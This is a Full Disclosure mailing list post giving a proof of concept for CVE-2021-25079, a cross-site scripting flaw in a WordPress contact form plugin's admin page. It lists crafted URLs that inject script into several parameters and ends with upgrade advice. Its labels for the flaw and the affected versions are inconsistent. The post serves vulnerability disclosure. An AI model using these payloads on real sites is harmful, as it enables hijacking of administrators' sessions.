[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] PoC for CVE-2021-25079

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] PoC for CVE-2021-25079
From: Gaetano Perrone <gaetano.perrone@xxxxxxxx>
Date: Fri, 7 Jan 2022 09:33:15 +0100

Hello, I've disclosed CVE-2021-25079 Wordpress Contact Form Entry plugin
vulnerability.
here attached the exploit for the vulnerability
GP

# Exploit Title: Contact Form Entries < 1.1.7 - Unauthenticated Stored 
Cross-Site Scripting. 
# Date: 22/12/2021
# Exploit Author: gx1  <gaetano.perrone[at]secsi.io>
# Vulnerability Discovery: Gaetano Perrone (aka gx1)
# Vendor Homepage:   https://www.crmperks.com/
# Software Link:         https://wordpress.org/plugins/contact-form-entries/
# Version: < 1.2.4
# Tested on: any
# CVE :  CVE-2021-25079



# References: 
* https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63
* 
https://secsi.io/blog/cve-2021-25079-multiple-reflected-xss-in-contact-form-entries-plugin/

# Description: 
Several params of vxcf_leads administrator page are vulnerable to a Reflected 
Cross-Site-Scripting vulnerability.





# Proof Of Concept: 

The following request:
---------------------------------------------------------------------------------------------------------------------------------------

GET 
/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+GET
 
/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+

---------------------------------------------------------------------------------------------------------------------------------------

returns the list of saved entries in the database.
form_id value is reflected in <input> tag. 
form_id parameter is not sanitized, so it is possible to inject arbitrary 
values.

The following request:

---------------------------------------------------------------------------------------------------------------------------------------
http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+onmouseover%3Dalert%281%29+ne97l&status&tab=entries&search&order=desc&orderby=fir+
 
---------------------------------------------------------------------------------------------------------------------------------------

Allows to inject onmouseover inside the input form. 
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<input class="hide-column-tog" name="cf_5e1kpc\" onmouseover=alert(1) 
ne97l-vxvx-vxurl-hide" type="checkbox" id="cf_5e1kpc\" onmouseover=alert(1) 
ne97l-vxvx-vxurl-hide" value="cf_5e1kpc\" onmouseover=alert(1) 
ne97l-vxvx-vxurl" checked='checked' />Source</label><label>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


By moving the mouse inside the click element, the vulnerability is triggered. 
Even if the vulnerability seems to require the user to move the mouse on the 
input element, it is possible to improve the attack by just injecting a “style” 
section that expands the input element with large width and height. In this 
way, when the user clicks on the link, javascript code is executed. 

status param is vulnerable to most dangerous XSS attack: just sending the 
following request  
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=b9zrb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eg482f&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date
   
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

will execute XSS vulnerability.  

order, orderby and search parameters are also vulnerable to XSS:
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir%20ihj17%22accesskey%3d%22x%22onclick%3d%22alert(1)%22%2f%2fv9tdt

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------



# Solution: 
Upgrade Contact Form Entries to version 1.2.4

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] Backdoor.Win32.SilentSpy.10 / Authentication Race Condition
Next by Date: [FD] cWifi Hotspot Wireless CP - Code Execution Vulnerability
Previous by thread: [FD] Backdoor.Win32.SilentSpy.10 / Authentication Race Condition
Next by thread: [FD] cWifi Hotspot Wireless CP - Code Execution Vulnerability
Index(es):
- Date
- Thread